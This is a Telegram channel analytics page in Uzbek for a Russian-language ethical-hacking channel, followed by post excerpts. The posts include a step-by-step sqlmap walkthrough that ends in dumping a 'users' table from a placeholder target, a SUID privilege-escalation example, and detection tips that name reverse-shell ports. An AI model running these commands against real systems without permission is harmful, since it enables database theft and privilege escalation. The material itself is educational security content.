CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Ko'proq ko'rsatish📈 Telegram kanali CodeGuard: CyberSec Edition analitikasi
CodeGuard: CyberSec Edition kanali faol ishtirokchi. Hozirda hamjamiyat 12 832 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 9 780-o'rinni va Rossiya mintaqasida 51 077-o'rinni egallagan.
📊 Auditoriya ko‘rsatkichlari va dinamika
невідомо sanasidan buyon loyiha tez o‘sib, 12 832 obunachiga ega bo‘ldi.
15 Iyul, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 415 ga, so‘nggi 24 soatda esa 3 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.
- Tasdiqlash holati: Tasdiqlanmagan
- Jalb etish (ER): Auditoriya o‘rtacha 12.13% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 6.18% ini tashkil etuvchi reaksiyalarni to‘playdi.
- Post qamrovi: Har bir post o‘rtacha 1 556 marta ko‘riladi; birinchi sutkada odatda 793 ta ko‘rish yig‘iladi.
- Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 5 ta reaksiya keladi.
- Tematik yo‘nalishlar: Kontent codeguard, pysec, docker, grep, контейнер kabi asosiy mavzularga jamlangan.
📝 Tavsif va kontent siyosati
Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Yuqori yangilanish chastotasi (oxirgi ma’lumot 16 Iyul, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.
🔵Как AiTM-фишинг обходил MFA мейнтейнеров 🔵Почему proof of concept такого червя создали ещё 10 лет назад 🔵Как защитить свои проекты от supply chain-атакИдеально для разработчиков, DevOps и всех, кто работает с open-source. 😈 CodeGuard: PySec Edition | Чат
owasp.org/www-project-juice-shop
Как начать:
docker pull bkimminich/juice-shop
docker run -d -p 3000:3000 bkimminich/juice-shop
Открыть http://localhost:3000
😈 CodeGuard: PySec Edition | Чатgit clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
Шаг 2. Базовое сканирование
python sqlmap.py -u "https://target.com/page?id=1"
Шаг 3. Забираем базы данных
python sqlmap.py -u "https://target.com/page?id=1" --dbs
Шаг 4. Забираем таблицы
python sqlmap.py -u "https://target.com/page?id=1" -D имя_бд --tables
Шаг 5. Дамп таблиц
python sqlmap.py -u "https://target.com/page?id=1" -D имя_бд -T users --dump
Важно: Только на своих системах или с разрешения. За несанкционированный доступ — уголовная статья.
😈 CodeGuard: PySec Edition | Чатfind / -perm -4000 2>/dev/null
Проверка на уязвимые известные бинарники:
text
find / -perm -4000 2>/dev/null | grep -E "nmap|vim|find|bash|less|more"
Пример эксплуатации (на своих виртуалках):
/usr/bin/find /etc/passwd -exec whoami \;
Если результат root — вы повысили привилегии.
Что делать для защиты: Убирать SUID с ненужных файлов через chmod u-s /path/to/file
😈 CodeGuard: PySec Edition | Чат🔵Что под ударом: Zyxel NAS, DSL-роутеры, точки доступа. Список: NAS326, NAS542, NWA50AX, WAC500 и другие. 🔵Где искать: Проверьте сайт Zyxel, загрузите ваш IP в поисковик по модели. 🔵Что искать: Пользователи zyfwp, Printer, MFT. В логах SSH — подозрильные входы с незнакомых IP.Как защититься: Обновите прошивку до версии с патчем. Если нет обновления — отключите удалённый доступ к админке. 😈 CodeGuard: PySec Edition | Чат
github.com/qeeqbox/social-analyzer)
Установка:
git clone https://github.com/qeeqbox/social-analyzer
cd social-analyzer
npm install
Запуск: npm start → открыть http://localhost:9000
🔥 Кейс: OSINT-специалист искал угрозы в компании. Забил ник тестировщика из чата поддержки — обнаружил, что тот же логин использовался на форуме по продаже базы клиентов. Нарушителя уволили до утечки.
💡 Совет: Запускайте через VPN, чтобы не спалить IP.
😈 CodeGuard: PySec Edition | Чат🔵Перехват и модификация запросов/ответов на лету 🔵Работа через консоль (mitmproxy) или веб-интерфейс (mitmweb) 🔵Скриптование на Python 🔵Поддержка HTTP/2, WebSocket, gRPCБыстрый старт:
pip install mitmproxy
mitmweb
Важно: Использовать только на своих устройствах или с разрешения владельца.
😈 CodeGuard: PySec Edition | Чат➡️Злоумышленник обманывает процессор, подсовывая фальшивый чип SPD, который врёт о размере памяти. Это создаёт «двойников» физических адресов и позволяет читать зашифрованную память гостевой VMПочему опасно: Атака работает на серверах AMD EPYC (3-е и 4-е поколения) с памятью DDR4/DDR5. Учёные подтвердили, что под ударом AMD SEV-SNP . Что делать: AMD выпустила обновления прошивки. Используйте модули памяти с заблокированным SPD и обновите BIOS 😈 CodeGuard: PySec Edition | Чат
netstat -tulpn # слушающие порты netstat -tupan # все соединенияss (быстрее):
ss -tulpn # слушающие порты ss -t state established # только активные🔴 Красные флаги: порты 4444, 1337, 6667, процессы с именами
evil.py, reverse.
Убить процесс: kill -9 [PID]
Сохраняйте.
😈 CodeGuard: PySec Edition | Чат➡️Easttom пишет просто, с реальными примерами. В каждой главе — упражнения и вопросы для самопроверки . Подойдёт студентам, системным администраторам и менеджерам, которые хотят понимать риски.💠 Качай книгу → [Archive] 😈 CodeGuard: PySec Edition | Чат
🔵Пролог: Пару лет назад решил я сменить пароль от GitHub. Залез в менеджер паролей, сгенерировал рандомную строку на 24 символа: 7$qE#pL2!mX8@zR4&vB6*eC9. Скопировал, вставил, подтвердил. GitHub сказал "спасибо". Чувствовал себя неуязвимым. 🔵Пауза (12 месяцев): За это время я ни разу не вводил пароль руками — SSH-ключи делали всю работу. 🔵Пятница, 23:50: Понадобилось зайти в GitHub с ноутбука друга. Открываю менеджер паролей, а он... требует мастер-пароль. Который я тоже забыл. Потому что менеджером не пользовался последние полгода.Битва начинается: Раунд 1 — перебор вариантов. Ввожу
7$qE#pL2!mX8@zR4&vB6*eC9 — неверно. Может, регистр другой? Ввожу снова — неверно.
Раунд 2 — дикий танец с бубном. Сброс пароля через почту? Но почта требует двухфакторку с телефона, который тоже разрядился.
Раунд 3 — смирение. В 2 часа ночи нажимаю "Forgot password". GitHub присылает ссылку на восстановление, и я наконец-то захожу с новым паролем (записал на бумажке).
Что я понял:
➡️ Менеджеры паролей бесполезны без главного пароля, который вы помните ➡️ 24 символа — круто, если это пароль от root-сервера, но не от повседневных сервисов ➡️ Стикер с паролем под клавиатурой — не такой уж плохой вариант, если это ваш личный ноутбук ➡️ Бекап мастер-пароля в запечатанном конверте — мастхэвP.S. Мой новый пароль от GitHub записан на стикере и лежит в кошельке. 😈 CodeGuard: PySec Edition | Чат
➡️Мощный сканер уязвимостей на YAML-шаблонах. В репозитории с шаблонами собраны тысячи готовых проверок — от CVE до некорректных конфигураций.Что можно проверять: Веб-приложения (SQLi, XSS, SSRF, XXE) Сетевые сервисы (SSH, FTP, SMB, RDP) DNS, облачные сервисы, API, GraphQL CI/CD системы (Jenkins, GitLab, GitHub) Известные CVE (от 2020 до свежих 2025/2026) 😈 CodeGuard: PySec Edition | Чат
